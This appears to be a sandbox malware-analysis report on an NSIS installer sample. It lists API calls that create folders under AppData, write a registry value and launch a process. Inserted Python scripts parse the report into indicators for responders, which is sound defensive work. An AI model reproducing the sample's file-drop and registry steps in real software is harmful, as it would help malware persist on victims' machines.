                                      • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9

Control-flow Graph

• Function 00405D6D-00405DBF (rendered graph omitted; blocks were marked executed / not executed). No internal calls. Imports on the graph: GetTickCount, GetTempFileNameW (both inside a retry loop that re-enters the GetTickCount block on failure).
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405D8B
                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\SDWLLRJcsY.exe",0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403589), ref: 00405DA6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: "C:\Users\user\Desktop\SDWLLRJcsY.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                      • API String ID: 1716503409-1830689474
                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                      • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                      • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
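The "APIs" and "String ID" entries in the function listings above are the report's compact record of which Win32 call touched which path and from which call site (for instance the extraction routine at 0040176F writing under C:\Users\user\AppData\Roaming\... and the temp-file routine at 00405D6D working in C:\Users\user\AppData\Local\Temp\). The following Python is an added example, not part of the Joe Sandbox report or of the NSIS stub it disassembles: it parses lines in exactly the format printed on this page into structured call records and groups the file-system indicators by call site. The regular expressions, the `ApiCall` record and the `extract_iocs` helper are my own construction; the sample input is copied from entries on this page and assumes the comma-separated argument layout shown here.

```python
"""Pull file-system indicators out of Joe Sandbox per-function "APIs" and
"String ID" entries (the text format shown on this page).

Added example for this report; the parsing helpers and the IOC grouping are my
own construction, not part of Joe Sandbox or of the NSIS stub being analysed."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One "• Api.MODULE(args), ref: ADDR" entry, optionally nested as
# "Part of subcall function XXXXXXXX: ...". Some entries carry no argument
# list at all, e.g. "GetLastError.KERNEL32 ref: 004057D6".
API_LINE = re.compile(
    r"""^\s*(?:\u2022\s*)?
        (?:Part\ of\ subcall\ function\ (?P<caller>[0-9A-Fa-f]{8}):\s*)?
        (?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)
        (?:\((?P<args>.*)\))?
        \s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$""",
    re.VERBOSE,
)
# "• String ID: a$b$c" lists the function's referenced strings joined by '$'.
STRING_ID_LINE = re.compile(r"^\s*(?:\u2022\s*)?String ID:\s*(?P<body>.*\S)\s*$")
# A Windows absolute path inside an argument list: drive letter, backslash,
# then everything up to the next comma or double quote.
WIN_PATH = re.compile(r'[A-Za-z]:\\[^,"]+')


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str                      # address of the call site
    args: List[str]
    caller: Optional[str] = None  # set for "Part of subcall function" lines

    @property
    def paths(self) -> List[str]:
        return [p for a in self.args for p in WIN_PATH.findall(a)]


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if m is None:
        return None
    raw = m.group("args") or ""
    # Arguments are comma separated; none of the paths on this page contain a
    # comma, so a plain split is adequate for this format.
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("module"),
                   m.group("ref").upper(), args, m.group("caller"))


def parse_string_ids(line: str) -> List[str]:
    m = STRING_ID_LINE.match(line)
    return [s for s in m.group("body").split("$") if s] if m else []


def extract_iocs(report_lines: List[str]) -> Dict[str, object]:
    """Group every path by the call sites (Api@ref) that used it; paths that
    only show up in a String ID list are reported separately, since they name
    a file the function references but no listed call was seen to touch."""
    by_path: Dict[str, List[str]] = {}
    string_paths: List[str] = []
    for line in report_lines:
        call = parse_api_line(line)
        if call is not None:
            site = f"{call.api}@{call.ref}"
            for p in call.paths:
                sites = by_path.setdefault(p, [])
                if site not in sites:      # same path may repeat in one arg list
                    sites.append(site)
            continue
        for s in parse_string_ids(line):
            if WIN_PATH.fullmatch(s) and s not in string_paths:
                string_paths.append(s)
    return {"paths": by_path,
            "strings_only": [p for p in string_paths if p not in by_path]}


# Constructed input: entries copied from the function listings on this page.
SAMPLE = [
    "• lstrcatW.KERNEL32(00000000,00000000,Noncyclical,C:\\Users\\user\\AppData\\Roaming"
    "\\intercessionate\\Favourablies117\\sulfonylurea\\Hypertragic\\Cantilene,?,?,00000031), ref: 004017B0",
    "  • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,"
    "00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259",
    "• String ID: C:\\Users\\user\\AppData\\Roaming\\intercessionate\\Favourablies117"
    "\\sulfonylurea\\Hypertragic\\Cantilene$C:\\Windows\\Intragantes.geo$Noncyclical$sarcoderma",
    "• CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2",
    "• GetLastError.KERNEL32 ref: 004057D6",
    '• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\\Users\\user\\Desktop\\SDWLLRJcsY.exe",'
    "0040333B,1033,C:\\Users\\user\\AppData\\Local\\Temp\\,C:\\Users\\user\\AppData\\Local\\Temp\\,"
    "74DF3420,00403589), ref: 00405DA6",
    "• LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040661C",
]

if __name__ == "__main__":
    result = extract_iocs(SAMPLE)
    for path, sites in result["paths"].items():
        print(f"{path}  <-  {', '.join(sites)}")
    for path in result["strings_only"]:
        print(f"{path}  <-  referenced string only")
```

Running it over the constructed sample yields the Roaming drop path tied to lstrcatW@004017B0, the Desktop sample path and the Temp directory tied to GetTempFileNameW@00405DA6, and C:\Windows\Intragantes.geo reported as a referenced string only, which is the distinction a responder wants when deciding which paths were actually written during the run and which merely appear in the binary.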

Control-flow Graph

• Function 00401C19-00402ACE (rendered graph omitted; blocks were marked executed / not executed). Internal calls: 00402C15, 00402C37. Imports on the graph: FindWindowExW, SendMessageTimeoutW, SendMessageW.
                                      APIs
                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: MessageSend$Timeout
                                      • String ID: !
                                      • API String ID: 1777923405-2657877971
                                      • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                      • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                      • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                      • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28

                                       Control-flow Graph (basic blocks with their internal "call" targets and imported APIs, followed by successor blocks)
                                       • 757: 4023de-40240f, call 402c37 (x2), call 402cc7 -> 764, 765
                                       • 764: 402415-40241f -> 766, 767
                                       • 766: 402421-40242e, call 402c37, lstrlenW -> 767
                                       • 767: 402432-402435 -> 770, 771
                                       • 770: 402437-402448, call 402c15 -> 771
                                       • 771: 402449-40244c -> 775, 776
                                       • 776: 40244e-402458, call 4030fa -> 775
                                       • 775: 40245d-402471, RegSetValueExW -> 779, 780
                                       • 779: 402473 -> 780
                                       • 780: 402476-402557, RegCloseKey -> 765, 782
                                       • 782: 402885-40288c -> 765
                                       • 765: 402abf-402ace
                                      APIs
                                      • lstrlenW.KERNEL32(sarcoderma,00000023,00000011,00000002), ref: 00402429
                                      • RegSetValueExW.KERNELBASE(?,?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402469
                                      • RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CloseValuelstrlen
                                      • String ID: sarcoderma
                                      • API String ID: 2655323295-3317469366
                                      • Opcode ID: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                      • Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
                                      • Opcode Fuzzy Hash: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                      • Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58
                                      APIs
                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                      • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                      • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: Close$Enum
                                      • String ID:
                                      • API String ID: 464197530-0
                                      • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                      • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                      • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                      • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                      APIs
                                        • Part of subcall function 00405BC8: CharNextW.USER32(?,?,00425EF0,?,00405C3C,00425EF0,00425EF0,?,?,74DF3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405BD6
                                        • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                        • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                        • Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene,?,00000000,000000F0), ref: 0040164D
                                      Strings
                                      • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene, xrefs: 00401640
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                      • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene
                                      • API String ID: 1892508949-2332916965
                                      • Opcode ID: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                      • Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
                                      • Opcode Fuzzy Hash: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                      • Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E
                                      APIs
                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,0040638E,80000002), ref: 00406160
                                      • RegCloseKey.KERNELBASE(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 0040616B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CloseQueryValue
                                      • String ID: : Completed
                                      • API String ID: 3356406503-2954849223
                                      • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                      • Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
                                      • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                      • Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4
                                      APIs
                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                      • CloseHandle.KERNEL32(?), ref: 00405867
                                      Strings
                                      • Error launching installer, xrefs: 00405844
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: Error launching installer
                                      • API String ID: 3712363035-66219284
                                      • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                      • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                      • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                      • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
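                                       The "APIs" bullets in the function blocks above (RegSetValueExW with the "sarcoderma" value name, SetCurrentDirectoryW into the Roaming\intercessionate\... directory, RegQueryValueExW under Software\Microsoft\Windows\CurrentVersion, CreateProcessW with "Error launching installer") are the most useful lines of this listing for a responder, but they are buried in per-function boilerplate. The Python below, an added example and not Joe Sandbox code, parses bullets of that exact shape into records and sorts the literal arguments into file paths, registry material and other strings. The sample input is a handful of lines copied from the blocks above; argument positions are taken as printed (the report shows raw stack values, so an argument slot is not guaranteed to be the API's formal parameter), and the HKEY root-handle table is the standard predefined-key constants, not something the report states.

```python
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: "APIs" bullets copied from the function blocks in this report.
SAMPLE = r"""
• RegSetValueExW.KERNELBASE(?,?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402469
• RegCloseKey.KERNELBASE(?,?,?,sarcoderma,00000000,00000011,00000002), ref: 00402551
  • Part of subcall function 00405BC8: CharNextW.USER32(?,?,00425EF0,?,00405C3C,00425EF0,00425EF0,?,?,74DF3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405BD6
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Hypertragic\Cantilene,?,00000000,000000F0), ref: 0040164D
• RegCloseKey.KERNELBASE(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 0040616B
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
"""

# One bullet: optional "Part of subcall function XXXXXXXX:" prefix,
# then Name.MODULE(arg,arg,...), then "ref: XXXXXXXX" (the call site).
_API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
_HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")      # raw 32-bit stack value
_WIN_PATH = re.compile(r"^[A-Za-z]:\\")      # drive-letter path

# Predefined registry root handles (standard Windows constants, not from the report).
HKEY_ROOTS = {
    "80000000": "HKEY_CLASSES_ROOT",
    "80000001": "HKEY_CURRENT_USER",
    "80000002": "HKEY_LOCAL_MACHINE",
    "80000003": "HKEY_USERS",
}


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: tuple              # stack values as printed; "?" means unresolved
    ref: int                 # address of the call instruction
    subcall_of: Optional[int]  # set for "Part of subcall function" entries


def parse_api_lines(text: str) -> list[ApiCall]:
    """Turn the report's API bullets into ApiCall records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        # Arguments in these dumps contain no commas, so a plain split is safe.
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(
            name=m["name"],
            module=m["module"],
            args=args,
            ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def extract_iocs(calls: list[ApiCall]) -> dict[str, set]:
    """Bucket literal arguments: file paths, registry roots/subkeys, other strings."""
    iocs: dict[str, set] = {"paths": set(), "registry": set(), "strings": set()}
    for c in calls:
        is_reg = c.name.startswith("Reg")
        for a in c.args:
            if a == "?" or _HEX8.match(a):
                # Numeric slot: only interesting when it is an HKEY root in a Reg* call.
                if is_reg and a in HKEY_ROOTS:
                    iocs["registry"].add(HKEY_ROOTS[a])
                continue
            if _WIN_PATH.match(a):
                iocs["paths"].add(a)
            elif is_reg and "\\" in a:
                iocs["registry"].add(a)      # subkey path such as Software\...
            else:
                iocs["strings"].add(a)       # value names, messages, markers
    return iocs


if __name__ == "__main__":
    for bucket, items in extract_iocs(parse_api_lines(SAMPLE)).items():
        print(bucket)
        for item in sorted(items):
            print("   ", item)
```

Run it against a saved copy of the report's disassembly section to get a deduplicated list of dropped-file locations and registry keys to check on a suspect host; treat the string bucket as context (for example, "Error launching installer" is an NSIS stub message, not an indicator on its own).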
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1710983609.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711022704.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711044282.0000000000459000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1711247951.00000000004A3000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_SDWLLRJcsY.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                      • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                      • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                      • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1711002707.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
